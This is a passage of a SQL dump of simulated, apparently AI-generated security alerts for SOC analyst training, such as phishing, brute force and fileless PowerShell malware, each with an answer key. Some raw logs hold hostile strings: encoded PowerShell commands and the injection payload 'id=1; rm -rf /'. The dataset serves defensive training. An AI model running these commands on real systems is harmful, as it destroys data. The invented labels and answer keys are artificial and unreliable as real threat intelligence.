'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command associated with malware delivery\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware techniques often used by APT groups.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (722, 'False Positive: Anomalous Login Activity', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address. Investigation reveals this is a legitimate user traveling.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"104.28.0.34\",\"dst_ip\":\"10.0.0.12\",\"username\":\"john.doe\",\"hostname\":\"SERVER-02\",\"failed_attempts\":8}', '2026-01-10 00:28:18', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.28.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity, identified as part of legitimate travel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User confirmed to be on business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"User was traveling, resulting in login attempts from an unusual location. No malicious intent detected.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH'), (723, 'APT41 Spear-Phishing Attack Detected via Malicious Email Link', 'critical', 'Proofpoint', 'A spear-phishing email containing a malicious link was detected targeting a high-level executive. The email was crafted to appear as a legitimate communication from a trusted partner.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-12\",\"email_sender\":\"ceo@trustedpartner.com\",\"url\":\"http://malicious-link.com/verify\",\"subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 09:08:55', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for phishing and spam activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"ceo@trustedpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain detected\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The alert is a true positive as the email contained a malicious link that was confirmed to be part of a phishing campaign.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'), (724, 'Lazarus Group Fileless Malware Execution Detected', 'high', 'CrowdStrike', 'A fileless malware was executed using PowerShell obfuscation techniques. The execution was traced back to a known Lazarus Group C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.47\",\"dst_ip\":\"192.168.1.45\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"file_hash\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\"}', '2026-01-10 02:51:53', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscation technique used by APT actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent fileless malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell obfuscation and the link to a known Lazarus C2 server confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (725, 'Cozy Bear Command Injection via Web Request', 'critical', 'Wazuh', 'A command injection attempt was detected via a vulnerable web application endpoint, originating from a Cozy Bear associated IP.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:02:59Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.200\",\"username\":\"webapp\",\"hostname\":\"WEB-SERVER-03\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://victim-site.com/update\"}', '2026-01-11 02:15:21', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple Cozy Bear related attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://victim-site.com/update\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL targeted in previous Cozy Bear campaigns\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The command injection payload and known Cozy Bear IP confirm this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (726, 'False Positive: Legitimate Network Activity Misidentified as Brute Force', 'medium', 'Splunk', 'Multiple login attempts were detected from an internal network IP address. The activity was later confirmed to be a legitimate script testing user access.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:50:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.30\",\"username\":\"testuser\",\"hostname\":\"AUTH-SERVER\",\"failed_attempts\":15}', '2026-01-10 01:14:37', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate script execution\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User account involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The alert was a false positive as the activity was part of a legitimate internal testing process.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (727, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected attempting to harvest credentials using a malicious URL disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"support@off1ce365-login.com\",\"url\":\"http://off1ce365-login.com/login\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 05:36:16', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@off1ce365-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain registered 3 days ago and associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://off1ce365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing page mimicking Office365 login\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL and a suspicious sender domain indicating a phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'), (728, 'Brute Force Attack Detected from Known Malicious IP', 'critical', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP, indicating a brute force attack targeting the internal network.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:32:13Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"username\":\"administrator\",\"hostname\":\"server01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":37}', '2026-01-09 18:10:39', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 174 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack originated from a known malicious IP with multiple failed login attempts, indicating brute force activity.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (729, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A malicious executable was detected running on an endpoint, identified by its known malware hash.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"jane.doe\",\"hostname\":\"workstation01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"C:\\\\malicious_folder\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:28:28', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 63 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious_folder\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as malware with C2 communication\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malicious, and the process execution is anomalous for the user.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (730, 'Suspicious Email Flagged as False Positive', 'medium', 'Email Gateway', 'An email was flagged as suspicious due to a lookalike domain, but the sender is verified as legitimate.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:48:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.smith@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"billing@examp1ecorp.com\",\"url\":\"http://examp1ecorp.com/invoice\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-10 08:48:40', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"billing@examp1ecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified sender; domain used by billing department\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://examp1ecorp.com/invoice\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles legitimate company domain but is legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and domain have been verified as legitimate, marking this as a false positive.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'), (731, 'Spear Phishing Attempt with Malicious URL Detected', 'high', 'Proofpoint', 'A spear phishing email was detected attempting to lure a user to a malicious website. The email impersonated the CEO and contained a link to a lookalike domain.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:32Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"j.doe@company.com\",\"hostname\":\"workstation-01\",\"email_sender\":\"ceo@company-secure.com\",\"domain\":\"company-secure.com\",\"url\":\"http://secure-company.com/login\"}', '2026-01-11 08:10:28', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns targeting corporate users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-company.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks impersonating company executives.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious domain impersonating the CEO, and the URL is flagged as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (732, 'Credential Harvesting via Office365 Phishing Page', 'critical', 'Email Gateway', 'An email was detected redirecting the user to an Office365 lookalike login page to steal credentials. The domain used was not authorized by the organization.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:18Z\",\"event_type\":\"email_received\",\"src_ip\":\"202.54.1.1\",\"dst_ip\":\"10.0.0.12\",\"username\":\"a.smith@company.com\",\"hostname\":\"workstation-02\",\"email_sender\":\"office365@security-alert.com\",\"domain\":\"security-alert.com\",\"url\":\"http://office-login.com/verify\"}', '2026-01-10 11:41:11', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"office365@security-alert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing attempts targeting Office365 users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site mimicking Office365 login page.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that leads to a phishing page designed to steal Office365 credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (733, 'Business Email Compromise Attempt via Lookalike Domain', 'medium', 'Proofpoint', 'An email pretending to be from a trusted partner was detected with a request for an urgent transaction. The sender\'s domain closely resembles an official domain but is slightly altered.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.8\",\"username\":\"c.brown@company.com\",\"hostname\":\"workstation-03\",\"email_sender\":\"partner@trusted-secure.com\",\"domain\":\"trusted-secure.com\",\"url\":\"http://secure-trusted.com/transaction\"}', '2026-01-09 17:01:50', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@trusted-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembling a trusted partner, associated with BEC attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-trusted.com/transaction\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL used in BEC scams to redirect users to fraudulent transaction pages.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender\'s domain is a lookalike of a trusted partner, used in a BEC attempt to request a fraudulent transaction.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT'), (734, 'False Positive Alert: Legitimate Email Flagged as Phishing', 'low', 'Email Gateway', 'An email from a new vendor was mistakenly flagged as phishing due to an unusual domain. The email content and sender\'s reputation are verified as legitimate.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:30:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.0.0.15\",\"username\":\"m.jones@company.com\",\"hostname\":\"workstation-04\",\"email_sender\":\"info@newvendor.com\",\"domain\":\"newvendor.com\",\"url\":\"http://newvendor.com/welcome\"}', '2026-01-11 06:47:17', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@newvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate by OSINT checks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://newvendor.com/welcome\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate, associated with a new vendor.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email from a new vendor was mistakenly flagged due to an unfamiliar domain but verified as legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (735, 'Spear Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A spear phishing email was detected targeting an employee, containing a malicious URL hosted on a lookalike domain. The email uses urgency language to lure the victim into clicking the link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.10.5\",\"username\":\"jdoe@example.com\",\"hostname\":\"WS-001\",\"email_sender\":\"ceo@examp1e.com\",\"url\":\"http://login.examp1e.com/secure\",\"email_subject\":\"Urgent: Verify Your Account Immediately\"}', '2026-01-11 02:32:22', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@examp1e.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.examp1e.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing login pages\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The lookalike domain and use of urgency suggest a targeted phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (736, 'Detected Command and Control Communication from Malware', 'critical', 'CrowdStrike', 'A malware infection was detected attempting to communicate with a known C2 server. The connection was initiated from an internal host.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.89\",\"username\":\"user1@company.com\",\"hostname\":\"PC-003\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\"}', '2026-01-10 14:58:13', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in several malware infections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication to a known C2 server confirms the host is compromised.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT'), (737, 'Failed Brute Force Login Attempts Detected', 'medium', 'Wazuh', 'Multiple failed login attempts were detected from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe@company.com\",\"hostname\":\"PC-004\",\"failed_attempts\":35}', '2026-01-11 11:45:57', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported several times for suspicious login activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No additional suspicious activity detected for this user\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and foreign IP location indicate a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (738, 'Suspicious Email Flagged as Possible False Positive', 'low', 'Email Gateway', 'An email was flagged as suspicious due to its sender domain, but analysis shows it matches known safe entities.', 'Phishing', 'T1598', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user2@company.com\",\"hostname\":\"WS-002\",\"email_sender\":\"newsletter@trustedsource.com\",\"email_subject\":\"Monthly Updates\"}', '2026-01-11 10:40:23', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"newsletter@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Sender domain verified as legitimate source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP matches known safe email servers\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and IP are verified as legitimate, indicating this is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (739, 'APT-Level Phishing Attack via Spoofed Office365 Login Page', 'critical', 'Proofpoint', 'A spear phishing email was detected attempting to harvest credentials using a spoofed Office365 login page. The email was sent from a lookalike domain and contained urgency language.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:34Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"jdoe@company.com\",\"hostname\":\"mail.company.com\",\"email_sender\":\"no-reply@0ffice365-security.com\",\"domain\":\"0ffice365-security.com\",\"url\":\"http://login-verifyoffice365.com\",\"email_subject\":\"Immediate Action Required: Verify Your Office365 Account\"}', '2026-01-11 14:23:02', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 157 times for phishing 